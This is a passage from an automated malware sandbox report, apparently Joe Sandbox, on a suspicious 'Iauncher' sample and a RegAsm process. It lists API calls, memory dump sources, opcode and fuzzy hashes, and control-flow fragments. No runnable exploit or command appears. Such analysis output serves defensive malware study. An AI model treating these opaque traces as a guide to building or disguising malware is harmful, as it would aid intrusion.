                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: 6bd3c4b01243ecf48f62f74adc142f05e62a0c4896a88bd9eb049e142ab70a95
                                                                                                                                                    • Instruction ID: 5b4d81848ed9cd4472a802ee1dfcc771884781c6f16a722b78818cded68f12e1
                                                                                                                                                    • Opcode Fuzzy Hash: 6bd3c4b01243ecf48f62f74adc142f05e62a0c4896a88bd9eb049e142ab70a95
                                                                                                                                                    • Instruction Fuzzy Hash: 4FF01C36500269BBCFA62FD5EC4D98A3F66FB697A1F045010FE19B5160D6328824EF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0058116F), ref: 0058181C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                    • String ID: TzX$SV
                                                                                                                                                    • API String ID: 3527080286-1236136107
                                                                                                                                                    • Opcode ID: 7c80f87416e6139804db78f77dbd256dbf4af03e5dc512c1bd1bf62e3311810b
                                                                                                                                                    • Instruction ID: f7cfe5147d7bae5ab35e00dab92ec7de00d1bc51538985272cd1c09928592fcb
                                                                                                                                                    • Opcode Fuzzy Hash: 7c80f87416e6139804db78f77dbd256dbf4af03e5dc512c1bd1bf62e3311810b
                                                                                                                                                    • Instruction Fuzzy Hash: 7F518C70904E0ECBCF14AFA9D89C1ADBFB8FB09310F114585EC91B6254CB748A6ADF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00569DB2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                    • Opcode ID: 61a25bfb5816decf72d7ae005e283730cfd82f7dd0b7af56615de460becc5959
                                                                                                                                                    • Instruction ID: f9f05d471e612532b99d77f0d8d5a59de8ff6dbb97ef4ea15a5c70aba94e3816
                                                                                                                                                    • Opcode Fuzzy Hash: 61a25bfb5816decf72d7ae005e283730cfd82f7dd0b7af56615de460becc5959
                                                                                                                                                    • Instruction Fuzzy Hash: 2841487290020AAFCF15DF94C985AEEBFB9FF48300F188199FA05A7261D7369D50DB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0056A89D,00000002,FlsGetValue,00585D40,FlsGetValue,00000000,?,0056972D), ref: 0056A7A5
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0056A7AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                    • String ID: @]X
                                                                                                                                                    • API String ID: 3013587201-3850284557
                                                                                                                                                    • Opcode ID: 41c81863bd52c15431092e99393f6ce71de39057c2df35b8bd0b30d0a0a8676c
                                                                                                                                                    • Instruction ID: 75b590781efe113c335f19460a488d93426bb140769538ff9264899e8142fd47
                                                                                                                                                    • Opcode Fuzzy Hash: 41c81863bd52c15431092e99393f6ce71de39057c2df35b8bd0b30d0a0a8676c
                                                                                                                                                    • Instruction Fuzzy Hash: 07117C356002159F9F23CF64DC8099A7BB5FB593607240269EA05FB250E630ED01DF92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005646C7
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00564723
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 593203224-4155469514
                                                                                                                                                    • Opcode ID: 9ebf8ef5dde649dfa98eb3ae28a8a914d7d967ef588709bfe9ae805a4744396e
                                                                                                                                                    • Instruction ID: 8c28116ec6bb0e953ba56d922f4cd9078597f1a86702dc84e4427da3a1580ff0
                                                                                                                                                    • Opcode Fuzzy Hash: 9ebf8ef5dde649dfa98eb3ae28a8a914d7d967ef588709bfe9ae805a4744396e
                                                                                                                                                    • Instruction Fuzzy Hash: F5018035A00115DFCB00DB14C899E597BB8FF95750B150099E802AB360DB70ED85CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00564457,?,0058CDB4,?), ref: 00568EAC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                    • String ID: WDV$SV
                                                                                                                                                    • API String ID: 3997070919-2958620284
                                                                                                                                                    • Opcode ID: 964d3d51ec5572e13a8cb3816b6fe97af5d5de74a2a0bcec7c1782c5ee5c0b83
                                                                                                                                                    • Instruction ID: 2e48817d100eb1baa4271c46d08f14970547fe883a3c0127d0eaddd62039c52f
                                                                                                                                                    • Opcode Fuzzy Hash: 964d3d51ec5572e13a8cb3816b6fe97af5d5de74a2a0bcec7c1782c5ee5c0b83
                                                                                                                                                    • Instruction Fuzzy Hash: D401A7759002099BCB019F98D844BAEBFB8FF84700F154159EE15AB351DBB1DD01CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00562000
                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00562038
                                                                                                                                                      • Part of subcall function 0056472C: _Yarn.LIBCPMT ref: 0056474B
                                                                                                                                                      • Part of subcall function 0056472C: _Yarn.LIBCPMT ref: 0056476F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                    • API String ID: 1908188788-1405518554
                                                                                                                                                    • Opcode ID: a2f487b2f4db40b38ff8e6d1fd005f3ed1a97e0f72b65466da6272b6b4435850
                                                                                                                                                    • Instruction ID: 8419c8cb1220260932f8266ca9ccb13a67fc5ce0c40649da82222d9a76e32e85
                                                                                                                                                    • Opcode Fuzzy Hash: a2f487b2f4db40b38ff8e6d1fd005f3ed1a97e0f72b65466da6272b6b4435850
                                                                                                                                                    • Instruction Fuzzy Hash: 72F01771505B419E83319F7A8485447FFE4BE292617908A2EE0DEC3A11D730E404CF6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00575DD4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                    • String ID: InitializeCriticalSectionEx$SV
                                                                                                                                                    • API String ID: 2593887523-44730804
                                                                                                                                                    • Opcode ID: 8c8694658975a6b702c091ce800f87ba47de0a676ef4a2313cf661d4381fc6f4
                                                                                                                                                    • Instruction ID: 5158e83d3eab3248a881c4223b7e1689a1ae63187f46c3dd16342c70fe845ed0
                                                                                                                                                    • Opcode Fuzzy Hash: 8c8694658975a6b702c091ce800f87ba47de0a676ef4a2313cf661d4381fc6f4
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE09232540618BBCB222F61EC0DD9E7F12FB64B61F008011FD1C35160DAB28961FBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Alloc
                                                                                                                                                    • String ID: FlsAlloc$SV
                                                                                                                                                    • API String ID: 2773662609-3610419160
                                                                                                                                                    • Opcode ID: af75b8e8c813980579d55d7d88b55314906bc3455e2661701a8f238933d8b4d7
                                                                                                                                                    • Instruction ID: 291396c900420a76017685ba6190bbf4957a7448f2fa597158d44a793d1a3bc9
                                                                                                                                                    • Opcode Fuzzy Hash: af75b8e8c813980579d55d7d88b55314906bc3455e2661701a8f238933d8b4d7
                                                                                                                                                    • Instruction Fuzzy Hash: 8BE0C231A80B2977C6123391AC0EFAE7D48FB60BA1B554020FD0879140ADE51D41FBD2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:8.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:95
                                                                                                                                                    Total number of Limit Nodes:10

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $q
                                                                                                                                                    • API String ID: 0-1301096350
                                                                                                                                                    • Opcode ID: 75a650d28dca044575ba05d986a16243d28c9ff65e38a7b6c251a4bbea02259e
                                                                                                                                                    • Instruction ID: 9889abd4a53638a3ee4f17a0b70df3ef39d768685ad48d2c7e3c83b714b1fd22
                                                                                                                                                    • Opcode Fuzzy Hash: 75a650d28dca044575ba05d986a16243d28c9ff65e38a7b6c251a4bbea02259e
                                                                                                                                                    • Instruction Fuzzy Hash: 9E128235B002159FDB14DF79D884A6EBBF6BF88710B14816AE406EB365DB71DC42CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: lldate
                                                                                                                                                    • API String ID: 0-434904232
                                                                                                                                                    • Opcode ID: d91c401831b6e0086623b35214f7c4985ac6f7c9e03afa132e23743754f41126
                                                                                                                                                    • Instruction ID: fa47a6608bca6d6dcd2781f433b616faa0a7620732673a0501adbc8f5658cb8c
                                                                                                                                                    • Opcode Fuzzy Hash: d91c401831b6e0086623b35214f7c4985ac6f7c9e03afa132e23743754f41126
                                                                                                                                                    • Instruction Fuzzy Hash: 9BD1D334910218CFCB14EFB5D8556ADBBB2FF8A306F5081AAE44AAB354DF319985CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: lldate
                                                                                                                                                    • API String ID: 0-434904232
                                                                                                                                                    • Opcode ID: 90a543fcafe6dc9f8759154a1fa94310ab6c397acbde18cd57b74afb7e19d293
                                                                                                                                                    • Instruction ID: b4da2f82f67a86ad47548fb5d56e80751fb1711af234fae80362bc9f2d1fe370
                                                                                                                                                    • Opcode Fuzzy Hash: 90a543fcafe6dc9f8759154a1fa94310ab6c397acbde18cd57b74afb7e19d293
                                                                                                                                                    • Instruction Fuzzy Hash: 53D1D234910218CFCB14EFB5D8556ADBBB2FF8A306F5081AAE44AAB254DF319985CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445300886.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5da0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 12186df75bc4110326acd1d33c8db9d7c627982ab1a393e1e846e916295cb4ff
                                                                                                                                                    • Instruction ID: cb45a4227ad4a3843db80e3b056103401eca0890eb8c0c658c138e8a61d54ca0
                                                                                                                                                    • Opcode Fuzzy Hash: 12186df75bc4110326acd1d33c8db9d7c627982ab1a393e1e846e916295cb4ff
                                                                                                                                                    • Instruction Fuzzy Hash: 51227E72A00215DFDB15DF64D880BAEBBF2FF84310F19856AE5059B2A1DB30ED46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                                                                                                                    • API String ID: 0-3886557441
                                                                                                                                                    • Opcode ID: b3f6c4ad339cbd6b088e061fc0b15308e14e249d7091ed6a00bcd1d2c1efe853
                                                                                                                                                    • Instruction ID: ad77dacde219df57047c9cb3558273363ba69aee36140b83bef14fe5382394e7
                                                                                                                                                    • Opcode Fuzzy Hash: b3f6c4ad339cbd6b088e061fc0b15308e14e249d7091ed6a00bcd1d2c1efe853
                                                                                                                                                    • Instruction Fuzzy Hash: 0FD19034B006059FEB19ABA9D844A7A7BE7FF88600F15845BE506CB3A6CF74DC06CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $q$$q$$q$$q$$q$$q
                                                                                                                                                    • API String ID: 0-2069967915
                                                                                                                                                    • Opcode ID: 736e329a6c58b634847e1e1b0f945f75d1890a4e2bb81910326ebf3d6cdf5aac
                                                                                                                                                    • Instruction ID: 709b49863b74e2fbef2efbbba26737c7126dc135b5bfe069b0c52139c3fd0b62
                                                                                                                                                    • Opcode Fuzzy Hash: 736e329a6c58b634847e1e1b0f945f75d1890a4e2bb81910326ebf3d6cdf5aac
                                                                                                                                                    • Instruction Fuzzy Hash: 09C1AF34B002019FEB14ABA5C854B3AB7E7FF89600F15845AE5439B3A2DF75EC46CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1445005438.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_5d80000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ZmPj
                                                                                                                                                    • API String ID: 0-3525819835
                                                                                                                                                    • Opcode ID: 3bc1e2da6cb1ea2d92ab149873fa45e3003b4a06ead42242416247d3344ddf4f
                                                                                                                                                    • Instruction ID: f92fa560ed07128660163b8f600a75068257601a7bb94612055c5c25b4dc9549
                                                                                                                                                    • Opcode Fuzzy Hash: 3bc1e2da6cb1ea2d92ab149873fa45e3003b4a06ead42242416247d3344ddf4f
                                                                                                                                                    • Instruction Fuzzy Hash: FE028D30B007148FEB29AB65D858B3D7AB2FF86700F51895AD5039F3A1CB79ED058B85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00BBB086
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                    • Opcode ID: 5fc66518710da37dacc4d8355190e3bb9e0be94f752ce5b361c8a8adc7acbe8d
                                                                                                                                                    • Instruction ID: 2f3b0be114016839571ad960cd2c1812b13b77a993aeadab53202c1e9d8dd776
                                                                                                                                                    • Opcode Fuzzy Hash: 5fc66518710da37dacc4d8355190e3bb9e0be94f752ce5b361c8a8adc7acbe8d
                                                                                                                                                    • Instruction Fuzzy Hash: 6C714A70A00B458FD724DF29D5417AABBF1FF88304F10896DE48AD7A50D7B5E845CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    APIs
                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04944381
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1443456211.0000000004940000.00000040.00000800.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_4940000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2714655100-0
                                                                                                                                                    • Opcode ID: 63140263c14b473e0fcf34c712371364055a38e3875ceb2393323fe1995887aa
                                                                                                                                                    • Instruction ID: f05b2350dc35ec13730b67fb8c3f6416af4586536cae35898668f325c8f0a5da
                                                                                                                                                    • Opcode Fuzzy Hash: 63140263c14b473e0fcf34c712371364055a38e3875ceb2393323fe1995887aa
                                                                                                                                                    • Instruction Fuzzy Hash: 344126B5A003059FDB14CF99C448FAABBF5FF88714F248969E519AB320D734A845CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BB59F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: b4caddca59866598741105ce5ab3aef287cc5cc1e8e24c0dd90447f56839cdec
                                                                                                                                                    • Instruction ID: c8ac4bb779eca754cc36c3278ca84054c627e2518c166d0e3120a7c4837a0127
                                                                                                                                                    • Opcode Fuzzy Hash: b4caddca59866598741105ce5ab3aef287cc5cc1e8e24c0dd90447f56839cdec
                                                                                                                                                    • Instruction Fuzzy Hash: 2641BD71D00719CBEB24DFA9C884B9DBBF5FB48314F20816AD408BB251DBB5A946CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1053 bb5935-bb593a 1054 bb5944-bb5a01 CreateActCtxA 1053->1054 1056 bb5a0a-bb5a64 1054->1056 1057 bb5a03-bb5a09 1054->1057 1064 bb5a73-bb5a77 1056->1064 1065 bb5a66-bb5a69 1056->1065 1057->1056 1066 bb5a79-bb5a85 1064->1066 1067 bb5a88 1064->1067 1065->1064 1066->1067 1069 bb5a89 1067->1069 1069->1069
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00BB59F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 327a25c4711aea7de2f68bc8b78574d05daf316a974ad31d7d6aa93b14c35b38
                                                                                                                                                    • Instruction ID: 47e0099278c6ba158fd3b5f417d81853f36fadafd4c3c2daa55f00ae2714b774
                                                                                                                                                    • Opcode Fuzzy Hash: 327a25c4711aea7de2f68bc8b78574d05daf316a974ad31d7d6aa93b14c35b38
                                                                                                                                                    • Instruction Fuzzy Hash: CA41DD71D00729CBEB24DFA9C884B9DBBF5BF48314F20816AD408BB251DBB56946CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1070 bbc9a0-bbd394 DuplicateHandle 1072 bbd39d-bbd3ba 1070->1072 1073 bbd396-bbd39c 1070->1073 1073->1072
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BBD2C6,?,?,?,?,?), ref: 00BBD387
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000D.00000002.1436310922.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_13_2_bb0000_RegAsm.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 77ff6ff2ce1004a1087032992d2e02d85e0afa83b85a90e26df2278e8413aeb1
                                                                                                                                                    • Instruction ID: 8b5146e2bf03ee84d5132dc7f3e5d7b2cb2b251618d3b06cf558eefa87c23e41
                                                                                                                                                    • Opcode Fuzzy Hash: 77ff6ff2ce1004a1087032992d2e02d85e0afa83b85a90e26df2278e8413aeb1
                                                                                                                                                    • Instruction Fuzzy Hash: D421E6B5D003489FDB10CF9AD984BEEBBF4EB48324F14845AE918A3310D778A954CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

